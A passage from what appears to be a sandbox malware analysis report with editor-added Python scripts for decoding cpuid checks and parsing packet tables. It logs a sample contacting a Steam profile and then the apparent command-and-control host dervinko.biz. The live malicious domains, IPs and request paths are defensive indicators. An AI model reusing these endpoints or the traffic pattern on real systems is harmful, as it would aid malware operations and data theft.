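    """Render a 32-bit immediate as the four bytes it occupies in memory
    (little-endian), which is how cpuid vendor strings are laid out."""
    return struct.pack("<I", value).decode("ascii")


def vendor_string(ebx: int, edx: int, ecx: int) -> str:
    """cpuid leaf 0 stores the 12-byte vendor id in EBX, EDX, ECX (in that order)."""
    return dword_to_ascii(ebx) + dword_to_ascii(edx) + dword_to_ascii(ecx)


def passes_vendor_check(ebx: int, edx: int, ecx: int) -> bool:
    """Replay the disassembly: XOR each register with its constant, OR the three
    results; the code takes the Intel-specific path when the OR is zero."""
    combined = (ebx ^ XOR_GENU) | (edx ^ XOR_INEI) | (ecx ^ XOR_NTEL)
    return combined == 0


def regs_for(vendor: str):
    """Constructed cpuid leaf-0 register values for a 12-character vendor id
    (test input; a real run would read them with the cpuid instruction)."""
    if len(vendor) != 12:
        raise ValueError("vendor id must be exactly 12 ASCII characters")
    ebx, edx, ecx = (
        struct.unpack("<I", vendor[i:i + 4].encode("ascii"))[0] for i in (0, 4, 8)
    )
    return ebx, edx, ecx


if __name__ == "__main__":
    print(dword_to_ascii(XOR_GENU), dword_to_ascii(XOR_INEI), dword_to_ascii(XOR_NTEL))
    for vendor in ("GenuineIntel", "AuthenticAMD"):
        print(vendor, passes_vendor_check(*regs_for(vendor)))
```

When triaging a cpuid hit, decode the immediates this way first: a vendor or feature-flag test next to the CRT's IsProcessorFeaturePresent call is compiler output, whereas a hypervisor-bit test (leaf 1, ECX bit 31) or a query of leaf 0x40000000 for the hypervisor vendor string would be worth flagging.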
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x55aa8 | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x59000 | 0x2554 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x54078 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x53fb8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x46000 | 0x168 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4496a | 0x44a00 | 6b6f1993190b3eaf82f607fed3374fc8 | False | 0.5182327242714025 | data | 6.601561733279373 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x46000 | 0x102ee | 0x10400 | 1e6dbecf754d7dd193b7e04220f82d31 | False | 0.5084735576923077 | data | 5.746131858736808 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x57000 | 0x1cc4 | 0x1000 | 24b02a7a00e869dc523bbcf409d4920b | False | 0.18701171875 | data | 3.063889339206937 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x59000 | 0x2554 | 0x2600 | a0a7de2fc21f5b1845c1b665768ca164 | False | 0.7729235197368421 | data | 6.576489949652338 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | MultiByteToWideChar, HeapFree, OutputDebugStringA, lstrlenA, Sleep, GetTempPathA, HeapAlloc, GetProcessHeap, GetModuleHandleW, FreeLibrary, GetNativeSystemInfo, ExitProcess, TerminateProcess, OpenProcess, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, CloseHandle, WideCharToMultiByte, HeapSize, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetStringTypeW, InitializeCriticalSectionEx, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, SetEndOfFile, CreateFileW, GetFileType, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, SetStdHandle, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FlushFileBuffers, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, WriteConsoleW
SHELL32.dll | SHGetFolderPathA
WININET.dll | InternetWriteFile
SHLWAPI.dll | PathMatchSpecA
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                          May 6, 2024 15:19:57.150940895 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.150958061 CEST44349701104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:57.382977009 CEST44349701104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:57.383064032 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.391374111 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.391387939 CEST44349701104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:57.391583920 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.391590118 CEST44349701104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:57.391741991 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.391746998 CEST44349701104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:57.391766071 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.391769886 CEST44349701104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:57.902451038 CEST44349701104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:57.902518988 CEST44349701104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:57.902517080 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.902561903 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.902628899 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.902645111 CEST44349701104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:57.902657986 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:57.902707100 CEST49701443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:58.989243031 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:58.989286900 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:58.989367962 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:58.989629984 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:58.989645958 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.218688011 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.218796968 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.219475985 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.219485044 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.219710112 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.219713926 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.219826937 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.219826937 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.219840050 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.219847918 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.689073086 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.689137936 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.689203978 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.689232111 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.689333916 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.689352989 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.689371109 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.689400911 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:00.870650053 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:00.870695114 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:00.870770931 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:00.871059895 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:00.871073961 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.102880955 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.103003025 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.103537083 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.103542089 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.103842020 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.103846073 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.103965044 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.103977919 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.104006052 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.104017019 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.579190969 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.579260111 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.579298019 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.579322100 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.579410076 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.579420090 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.579452991 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.579459906 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.642527103 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.642569065 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.642692089 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.643079996 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.643090010 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.871530056 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.871723890 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.872514009 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.872525930 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.872864962 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.872869968 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.873087883 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.873105049 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.873114109 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.873121977 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:03.228497028 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:03.228555918 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:03.228595018 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:03.228640079 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:03.257004023 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:03.257026911 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:03.257047892 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:03.257071972 CEST49704443192.168.2.6104.21.13.203
Timestamp  Source Port  Dest Port  Source IP  Dest IP
May 6, 2024 15:19:55.033732891 CEST  62546  53  192.168.2.6  1.1.1.1
May 6, 2024 15:19:55.143752098 CEST  53  62546  1.1.1.1  192.168.2.6
May 6, 2024 15:19:55.987637043 CEST  53986  53  192.168.2.6  1.1.1.1
May 6, 2024 15:19:56.107733011 CEST  53  53986  1.1.1.1  192.168.2.6
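The packet tables in this report are scraped with their columns run together: the timestamp is followed directly by source port, destination port, source IP and destination IP with no separator, so a digit run such as 44349700 could be read as 443/49700, 4434/9700 or 44349/700. The script below is an added example by the editor, not part of the Joe Sandbox report: it recovers the fields by enumerating every split and keeping the one consistent with valid IPv4 octets, the sandbox VM address 192.168.2.6 on one side, and a service port (53, 80 or 443, an assumption) paired with a Windows ephemeral port, then groups the packets into flows with first/last timestamp and packet counts per direction. The row strings are copied from this report's TCP and UDP tables (a subset); the constants and parsing rules are the editor's.

```python
"""Recover packet fields from the flattened Joe Sandbox network tables and group
the packets into flows. Added example: the row strings are copied from this
report (analysis 1436772); the parsing rules and flow logic are the editor's."""
import re
from datetime import datetime

# Rows as scraped from the report's TCP and UDP packet tables: the timestamp is
# followed directly by source port, destination port, source IP and destination
# IP with no separators. A subset of the report's rows.
TCP_ROWS = [
    "May 6, 2024 15:19:57.118191004 CEST44349700104.21.13.203192.168.2.6",
    "May 6, 2024 15:19:57.118200064 CEST49700443192.168.2.6104.21.13.203",
    "May 6, 2024 15:19:57.150495052 CEST49701443192.168.2.6104.21.13.203",
    "May 6, 2024 15:19:57.902707100 CEST49701443192.168.2.6104.21.13.203",
    "May 6, 2024 15:19:58.989243031 CEST49702443192.168.2.6104.21.13.203",
    "May 6, 2024 15:19:59.689400911 CEST49702443192.168.2.6104.21.13.203",
    "May 6, 2024 15:20:00.870650053 CEST49703443192.168.2.6104.21.13.203",
    "May 6, 2024 15:20:01.579459906 CEST49703443192.168.2.6104.21.13.203",
    "May 6, 2024 15:20:02.642527103 CEST49704443192.168.2.6104.21.13.203",
    "May 6, 2024 15:20:03.257071972 CEST49704443192.168.2.6104.21.13.203",
]
UDP_ROWS = [
    "May 6, 2024 15:19:55.033732891 CEST6254653192.168.2.61.1.1.1",
    "May 6, 2024 15:19:55.143752098 CEST53625461.1.1.1192.168.2.6",
    "May 6, 2024 15:19:55.987637043 CEST5398653192.168.2.61.1.1.1",
    "May 6, 2024 15:19:56.107733011 CEST53539861.1.1.1192.168.2.6",
]

SANDBOX_IP = "192.168.2.6"           # the analysis VM's address, as seen in the report
SERVICE_PORTS = {53, 80, 443}        # assumption: one side of every flow is one of these
DYNAMIC_PORTS = range(49152, 65536)  # Windows default ephemeral range (the VM is w10x64)

_IP_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")


def _valid_ip(text):
    m = _IP_RE.match(text)
    return bool(m) and all(int(o) <= 255 and (o == "0" or o[0] != "0") for o in m.groups())


def _valid_port(text):
    return text.isdigit() and text[0] != "0" and int(text) <= 65535


def parse_row(row, sandbox_ip=SANDBOX_IP):
    """Return (timestamp, src_port, dst_port, src_ip, dst_ip) for one flattened row.

    The digit run is ambiguous by itself ('44349700' could be 443/49700, 4434/9700
    or 44349/700), so every split is enumerated and filtered by three constraints:
    valid IPv4 octets, one endpoint is the sandbox VM, and the port pair is a
    service port plus an ephemeral port. Anything else raises rather than guessing.
    """
    ts_text, digits = row.split(" CEST", 1)
    ts = datetime.strptime(ts_text[:-3], "%b %d, %Y %H:%M:%S.%f")  # %f takes 6 digits
    found = set()
    for i in range(1, 6):                       # source port: 1..5 digits
        for j in range(i + 1, i + 6):           # destination port: 1..5 digits
            p1, p2, rest = digits[:i], digits[i:j], digits[j:]
            if not (_valid_port(p1) and _valid_port(p2)):
                continue
            for k in range(7, 16):              # a dotted quad is 7..15 characters
                ip1, ip2 = rest[:k], rest[k:]
                if _valid_ip(ip1) and _valid_ip(ip2):
                    found.add((int(p1), int(p2), ip1, ip2))
    ok = [c for c in found
          if sandbox_ip in (c[2], c[3])
          and ((c[0] in SERVICE_PORTS and c[1] in DYNAMIC_PORTS)
               or (c[1] in SERVICE_PORTS and c[0] in DYNAMIC_PORTS))]
    if len(ok) != 1:
        raise ValueError(f"cannot split row unambiguously: {row!r} -> {sorted(ok)}")
    return (ts,) + ok[0]


def flows(rows, sandbox_ip=SANDBOX_IP):
    """Group packets by (local port, remote IP, remote port), in order of first packet."""
    table = {}
    for row in rows:
        ts, sp, dp, sip, dip = parse_row(row, sandbox_ip)
        outbound = sip == sandbox_ip
        key = (sp, dip, dp) if outbound else (dp, sip, sp)
        f = table.setdefault(key, {"local_port": key[0], "remote_ip": key[1],
                                   "remote_port": key[2], "first": ts, "last": ts,
                                   "packets_out": 0, "packets_in": 0})
        f["first"], f["last"] = min(f["first"], ts), max(f["last"], ts)
        f["packets_out" if outbound else "packets_in"] += 1
    return list(table.values())


def duration(flow):
    """Seconds between the first and last packet of a flow."""
    return (flow["last"] - flow["first"]).total_seconds()


if __name__ == "__main__":
    for f in flows(TCP_ROWS) + flows(UDP_ROWS):
        print(f"{f['first'].time()}  :{f['local_port']} -> {f['remote_ip']}:{f['remote_port']}"
              f"  {f['packets_out']} out / {f['packets_in']} in  {duration(f):.3f}s")
```

Run against the rows above it lists the two DNS exchanges with 1.1.1.1 and five separate TCP flows to 104.21.13.203:443, one per source port 49700 to 49704, each lasting well under a second and starting roughly one to two seconds after the previous one; that is the structure the full table shows once the columns are separated. The three constraints are deliberate: without the sandbox-address rule the IP boundary is ambiguous (1.1.1.1/192.168.2.6 versus 1.1.1.11/92.168.2.6), and without the ephemeral-range rule a DNS reply row still admits 53/6254 beside 53/62546.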
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
May 6, 2024 15:19:55.033732891 CEST  192.168.2.6  1.1.1.1  0xa300  Standard query (0)  steamcommunity.com  A (IP address)  IN (0x0001)  false
May 6, 2024 15:19:55.987637043 CEST  192.168.2.6  1.1.1.1  0x52c  Standard query (0)  dervinko.biz  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
May 6, 2024 15:19:55.143752098 CEST  1.1.1.1  192.168.2.6  0xa300  No error (0)  steamcommunity.com  -  23.61.62.148  A (IP address)  IN (0x0001)  false
May 6, 2024 15:19:56.107733011 CEST  1.1.1.1  192.168.2.6  0x52c  No error (0)  dervinko.biz  -  104.21.13.203  A (IP address)  IN (0x0001)  false
May 6, 2024 15:19:56.107733011 CEST  1.1.1.1  192.168.2.6  0x52c  No error (0)  dervinko.biz  -  172.67.133.22  A (IP address)  IN (0x0001)  false
• steamcommunity.com
• dervinko.biz
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.6  49699  23.61.62.148  443  6256  C:\Users\user\Desktop\Gj8P0mbklo.exe
Timestamp  Bytes transferred  Direction  Data
2024-05-06 13:19:55 UTC  118  OUT  GET /profiles/76561199609719039 HTTP/1.1
User-Agent: MyApp/1.0
Host: steamcommunity.com
Cache-Control: no-cache
2024-05-06 13:19:55 UTC  1870  IN  HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 06 May 2024 13:19:55 GMT
Content-Length: 34789
Connection: close
Set-Cookie: sessionid=7ef34606fccdc72e192e6b4f; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C468fb9988c4683f3fae869b70d5335fe; Path=/; Secure; HttpOnly; SameSite=None
2024-05-06 13:19:55 UTC  14514  IN  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                          2024-05-06 13:19:55 UTC16384INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0d 0a 09 09 09 09 09 53 55 50 50 4f 52 54 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57
                                                                                                                                                                                          Data Ascii: <a class="menuitem supernav" href="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyW
                                                                                                                                                                                          2024-05-06 13:19:55 UTC3768INData Raw: 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27
                                                                                                                                                                                          Data Ascii: <span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'
                                                                                                                                                                                          2024-05-06 13:19:55 UTC123INData Raw: 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                          Data Ascii: </div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49700 | 104.21.13.203 | 443 | 6256 | C:\Users\user\Desktop\Gj8P0mbklo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-06 13:19:56 UTC | 126 | OUT | GET /ujs/89737b57-777d-400d-bb7f-77b7e024920e HTTP/1.1
User-Agent: MyApp/1.0
Host: dervinko.biz
Cache-Control: no-cache
2024-05-06 13:19:56 UTC | 571 | IN | HTTP/1.1 200 OK
Date: Mon, 06 May 2024 13:19:56 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2zedOCIcPFJlmB0XcL1mnzKPVStj2XErljhzCMFPX6yeN6%2FoOh8dcQrk8m7DMf%2Bd14kDF1cqciNks6vB1kHw8oz13TWluF7dQqOizCrqk8cOtnvgyhgWpPazm%2Bfimr0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f943caafa7a522-MIA
